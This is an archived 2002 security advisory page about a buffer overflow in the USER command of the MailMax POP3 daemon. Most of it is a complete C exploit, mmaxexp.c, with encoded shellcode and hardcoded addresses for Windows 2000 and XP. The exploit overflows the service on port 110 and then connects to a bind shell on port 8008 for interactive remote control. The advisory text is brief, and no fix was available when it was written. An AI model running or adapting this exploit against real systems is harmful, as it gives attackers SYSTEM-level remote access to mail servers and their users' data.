Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: Various Flavours :: aix5550.htm

MailMax pop3 daemon remote overflow on USER argument



24th Jul 2002 [SBWID-5550]
COMMAND

	SmartMax  Software's  MailMax  pop3  daemon  remote  overflow  on   USER
	argument

SYSTEMS AFFECTED

	MailMax Professional/Standard, All Versions

PROBLEM

	In 2c79cbe14ac7d0b8472d3f129fa1df55 security advisory [#4] :
	

	MailMax's  POP3  daemon,  'popmax',  does  not  perform  proper   bounds
	checking  on  the  'USER'  argument  resulting  in  the  possibility  of
	crashing the service or remotely manipulating  local  registers  to  the
	end of altering execution flow somewhere sinister..
	

	#EXPLOITATION
	

	unfortunately, we do not get eip right out of the box  here..  but  with
	buffers of various sizes we can get eax, ecx, and edx..  edx  being  the
	most useful as shown below..
	

	CALL [EDX+0C] @RVA413A08
	

	so now we just need to drop the rva of our shell that we'd like to  call
	into memory somewhere (-0C of course)..
	

	I wrote this exploit awhile ago, it's not dynamic as we  are  exploiting
	a pointer, so we can't just simply jmp to  a  register..  so  instead  I
	just repeated the shellcode rva that hits on my  3  test  machines  many
	times on every dword prior to the payload.. meaning we are depending  on
	2 static memory addresses.. there is probably  a  better  way  of  doing
	this, but I don't care enough..
	

	/*

		mmaxexp.c

		July 20th, 2002

	

		SmartMax MailMax Standard/Professional 4.8

		http://www.smartmax.com

		

		an overflow is present in the USER argument of

		the pop3max daemon.. however, we do not get eip..

		but with buffers of various sizes we can get

		eax, ecx, and edx.. edx being the most useful as

		shown below..

		

		CALL [EDX+0C] @RVA413A08

	

		so now we just need to drop the rva of our shell

		that we'd like to call into memory somewhere 

		(-0C of course)..see CALL

	

		YAY!@$!

		

		2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)		

	*/

		

	#include <stdio.h>

	#include <string.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <arpa/inet.h>

	#include <netdb.h>

	#include <sys/errno.h>

	#include <unistd.h>

	

	/* Windows 2000 Professional/Server */

	char EDX2k[]  = "\x30\xd7\x68\x06";

	char CALL2k[] = "\xec\xd9\x68\x06";

	

	/* Windows XP Professional */

	char EDXxp[]  = "\x30\xd7\x25\x06";

	char CALLxp[] = "\xec\xd9\x25\x06";

	

	/* we repeat the payload ptr on every */

	/* dword prior to our target rva in   */

	/* order to increase those sexy odds  */

	

	char shell[2205];

	

	char header[] = "\x55\x53\x45\x52\x20\x90\x90\x90";

	

	char payload[] ="\x55\x8b\xec"

			"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"

			"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"

			"\x90\x90\x90\xac\x34\x15\xaa\xe2\xfa\xfd\x15\x15\x15\x15"

			"\x48\x94\xf8\xcc\x34\x55\x15\x98\xa0\xe7\x31\x55\x15\x98"

			"\xa8\xef\x31\x55\x15\x7f\x12\x85\x85\x85\x85\x4c\xfd\xc7"

			"\x17\x15\x15\x98\xa0\x3f\x30\x55\x15\x98\xa8\x26\x30\x55"

			"\x15\x7f\x1f\x85\x85\x85\x85\x4c\xfd\xaf\x17\x15\x15\x7f"

			"\x15\x98\xa0\xcc\x30\x55\x15\x43\x98\xa0\xf0\x30\x55\x15"

			"\x43\x98\xa0\xfc\x30\x55\x15\x43\xea\x80\x26\x30\x55\x15"

			"\x7f\x15\x98\xa0\xcc\x30\x55\x15\x43\x98\xa0\xf8\x30\x55"

			"\x15\x43\x98\xa0\xe4\x30\x55\x15\x43\xea\x80\x26\x30\x55"

			"\x15\xd2\x90\xe0\x30\x55\x15\x51\x15\x15\x15\x98\xa0\xe0"

			"\x30\x55\x15\x43\xea\x80\x22\x30\x55\x15\x98\xa0\x38\x33"

			"\x55\x15\xb8\x45\xea\x80\x46\x30\x55\x15\x98\xa0\x24\x33"

			"\x55\x15\xb8\x45\xea\x80\x46\x30\x55\x15\x98\xa0\xe4\x30"

			"\x55\x15\x98\xa8\x38\x33\x55\x15\xb0\x98\xa0\xf0\x30\x55"

			"\x15\xb8\x98\xa8\x24\x33\x55\x15\xbe\x98\xa8\x20\x33\x55"

			"\x15\xbe\xd2\x90\x30\x33\x55\x15\x15\x15\x15\x15\xd2\x90"

			"\x34\x33\x55\x15\x14\x14\x15\x15\x98\xa0\x2c\x33\x55\x15"

			"\x43\x98\xa0\xe0\x30\x55\x15\x43\x7f\x15\x7f\x15\x7f\x05"

			"\x7f\x14\x7f\x15\x7f\x15\x98\xa0\x5c\x33\x55\x15\x43\x7f"

			"\x15\xea\x80\x2e\x30\x55\x15\x7d\x15\x35\x15\x15\x85\x7d"

			"\x15\x17\x15\x15\xea\x80\x56\x30\x55\x15\x9c\x90\x44\x33"

			"\x55\x15\x26\xd5\x45\x55\x45\x55\x45\xea\x80\xef\x31\x55"

			"\x15\x45\x4e\x7f\x05\x98\xa0\xdc\x30\x55\x15\x43\x46\xea"

			"\x80\xeb\x31\x55\x15\x7f\x16\x46\xea\x80\x17\x30\x55\x15"

			"\x98\xa0\x40\x33\x55\x15\x43\x98\xa0\xdc\x30\x55\x15\x43"

			"\x46\xea\x80\x13\x30\x55\x15\x98\xa8\x4c\x33\x55\x15\xbe"

			"\x26\xd5\x45\x98\xa8\x70\x33\x55\x15\x42\x45\x45\x45\x98"

			"\xa0\xfc\x30\x55\x15\xb8\x45\xea\x80\x2a\x30\x55\x15\x7f"

			"\x25\xea\x80\x5a\x30\x55\x15\xfe\x58\x85\x85\x85\x26\xd5"

			"\x45\x98\xa8\x70\x33\x55\x15\x42\x45\x45\x45\x98\xa0\xfc"

			"\x30\x55\x15\xb8\x45\xea\x80\x2a\x30\x55\x15\x7f\x45\xea"

			"\x80\x5a\x30\x55\x15\x96\xa8\x70\x33\x55\x15\x17\x1a\x97"

			"\x02\x14\x15\x15\x94\xa8\x70\x33\x55\x15\x14\x35\x15\x15"

			"\x67\x1b\x85\x85\x85\x85\xd2\x90\x70\x33\x55\x15\x15\x35"

			"\x15\x15\x7f\x15\x9e\x90\x70\x33\x55\x15\x98\xa8\x70\x33"

			"\x55\x15\x42\x45\x9e\x90\x44\x33\x55\x15\x45\x98\xa0\xfc"

			"\x30\x55\x15\xb8\x45\xea\x80\x52\x30\x55\x15\x7f\x45\xea"

			"\x80\x5a\x30\x55\x15\x9e\x90\x70\x33\x55\x15\x7f\x15\x45"

			"\x98\xa0\x44\x33\x55\x15\xb8\x45\x98\xa0\x4c\x33\x55\x15"

			"\xb8\x45\xea\x80\x1f\x30\x55\x15\x7f\x15\x98\xa8\x70\x33"

			"\x55\x15\x42\x7f\x15\x7f\x15\x7f\x15\x98\xa0\xfc\x30\x55"

			"\x15\xb8\x45\xea\x80\x2a\x30\x55\x15\x7f\x45\xea\x80\x5a"

			"\x30\x55\x15\x26\xdc\x2c\x98\x70\x33\x55\x15\x1a\x92\x72"

			"\xea\xea\xea\x7f\x15\x7d\x15\x35\x15\x15\x85\x98\xa0\x44"

			"\x33\x55\x15\xb8\x45\x98\xa0\x4c\x33\x55\x15\xb8\x45\xea"

			"\x80\x1b\x30\x55\x15\x9c\x90\x74\x33\x55\x15\x7f\x15\x98"

			"\xa8\x70\x33\x55\x15\x42\x45\x98\xa0\x44\x33\x55\x15\xb8"

			"\x45\x98\xa0\xf8\x30\x55\x15\xb8\x45\xea\x80\x5e\x30\x55"

			"\x15\x7f\x45\xea\x80\x5a\x30\x55\x15\x7f\x15\x9e\x90\x74"

			"\x33\x55\x15\x98\xa8\x70\x33\x55\x15\x42\x45\x9e\x90\x44"

			"\x33\x55\x15\x45\x98\xa0\xfc\x30\x55\x15\xb8\x45\xea\x80"

			"\x52\x30\x55\x15\x7f\x45\xea\x80\x5a\x30\x55\x15\xfc\xac"

			"\xeb\xea\xea\x98\xa0\x4c\x33\x55\x15\xb8\x45\xea\x80\x07"

			"\x30\x55\x15\x98\xa0\x48\x33\x55\x15\xb8\x45\xea\x80\x07"

			"\x30\x55\x15\x7f\x15\xea\x80\x42\x30\x55\x15\x44\x43\x7d"

			"\xdd\x59\xbd\x15\x85\x4f\xea\x07\x45\x4e\x4c\x42\x4b\x44"

			"\x43\x46\x7d\xe5\x59\xbd\x15\x85\x4f\xea\x07\x45\xb9\x91"

			"\xd5\x60\xee\x4d\xbe\x4c\xf7\xfc\xd6\x42\x46\x5a\x56\x5e"

			"\x26\x27\x15\x66\x7a\x76\x7e\x70\x61\x15\x77\x7c\x7b\x71"

			"\x15\x79\x7c\x66\x61\x70\x7b\x15\x74\x76\x76\x70\x65\x61"

			"\x15\x66\x70\x7b\x71\x15\x67\x70\x76\x63\x15\x76\x79\x7a"

			"\x66\x70\x66\x7a\x76\x7e\x70\x61\x15\x5e\x50\x47\x5b\x50"

			"\x59\x26\x27\x15\x56\x67\x70\x74\x61\x70\x45\x7c\x65\x70"

			"\x15\x52\x70\x61\x46\x61\x74\x67\x61\x60\x65\x5c\x7b\x73"

			"\x7a\x54\x15\x56\x67\x70\x74\x61\x70\x45\x67\x7a\x76\x70"

			"\x66\x66\x54\x15\x45\x70\x70\x7e\x5b\x74\x78\x70\x71\x45"

			"\x7c\x65\x70\x15\x52\x79\x7a\x77\x74\x79\x54\x79\x79\x7a"

			"\x76\x15\x47\x70\x74\x71\x53\x7c\x79\x70\x15\x42\x67\x7c"

			"\x61\x70\x53\x7c\x79\x70\x15\x46\x79\x70\x70\x65\x15\x56"

			"\x79\x7a\x66\x70\x5d\x74\x7b\x71\x79\x70\x15\x50\x6d\x7c"

			"\x61\x45\x67\x7a\x76\x70\x66\x66\x15\x56\x7a\x71\x70\x71"

			"\x35\x77\x6c\x35\x69\x4f\x74\x7b\x35\x29\x7c\x6f\x74\x7b"

			"\x55\x71\x70\x70\x65\x6f\x7a\x7b\x70\x3b\x7a\x67\x72\x2b"

			"\x17\x15\x0a\x5d\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x19\x15\x15\x15\x15\x15\x15\x15\x14\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x56\x58\x51\x3b\x50\x4d\x50\x15\x15\x15\x15\x15"

			"\x05\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15\x15"

			"\x15\x15\x15\x15\x15\x15\x1c\x1c\x1c\x1c\x1c\x90\x90\x90"

			"\x0d\x0a";

	

	main(char argc, char **argv){

	        int fd, i, opt;

	        int bufsize = 1024;

	        int *buffer = (int *)malloc(bufsize);

	        struct sockaddr_in sin;

	        struct hostent *he;

	        struct in_addr in;

	

		printf("MailMax Standard/Professional 4.8 remote 'SYSTEM' level exploit (07/20/2002)\n");

		printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)\n\n");

	

	        if (argc < 4){

	                printf("usage: %s <hostname> -t <type>\n\n", argv[0]);

	                printf("types: 0 - Windows 2000 Professional/Server\n");

	                printf("       1 - Windows XP Professional\n\n");

	                exit(-1);

	        }

	

	        while ((opt = getopt(argc, argv, "t:"))){

	        	switch(opt){

	                case 't':

				 if(optarg[0] == '0'){

				 	strcpy(shell, header);

				 	for(i = 1;i < 247;i++){

				 		strcat(shell, CALL2k);

				 	}

				 	strcat(shell, EDX2k);

				 	strcat(shell, payload);

				 	break;

				 }

				 

				 if(optarg[0] == '1'){

				 	strcpy(shell, header);

				 	for(i = 1; i < 247;i++){

				 		strcat(shell, CALLxp);

				 	}

				 	strcat(shell, EDXxp);

				 	strcat(shell, payload);

				 	break;

				 }

	                         

	                         printf("invalid type\n\n");

	                         printf("types: 0 - Windows 2000 Professional SP2 + hot fixes 6/8/2002\n");

	                         printf("       1 - Windows XP Professional SP1 + hot fixes 6/8/2002\n\n");

	                         exit(-1);

	                }

	                break;

	        }

	

	        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

	

	        if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}

	        else

	        if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

	

	        sin.sin_family = AF_INET;

	        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));

	        sin.sin_port = htons(110);

	 

	        printf("connecting to tcp port 110 (POP3)...\n");

	        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}

	 

	        printf("connected.\n\n");

	 	sleep(1);

	        printf("dumping payload...");

	        if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}

		printf("done\n");

		printf("code dumped.\n\n");

	

	        close(fd);

	

	        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

	

	        sin.sin_family = AF_INET;

	        sin.sin_addr.s_addr = inet_addr(argv[1]);

	        sin.sin_port = htons(8008);

	

	        printf("connecting to tcp port 8008... (wait 3s)\n");

	        sleep(3);

	        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){printf("exploit failed.. adjust EDX/CALL?\n\n");exit(-1);}

	        printf("success! izn0wnz3rat3d!\n\n");

	

	        while(1) {

	                fd_set input;

	

	                FD_SET(0,&input);

	                FD_SET(fd,&input);

	                if((select(fd+1,&input,NULL,NULL,NULL))<0) {

	                        if(errno==EINTR) continue;

	                        printf("connection reset\n"); fflush(stdout);

	                        exit(1);

	                }

	                if(FD_ISSET(fd,&input))

	                        write(1,buffer,read(fd,buffer,bufsize));

	                if(FD_ISSET(0,&input))

	                        write(fd,buffer,read(0,buffer,bufsize));

	        }

	

	        close(fd);

	

	}

	

SOLUTION

	Check ftp://ftp.smartmax.com/pub/Upgrades/ for updates, none yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH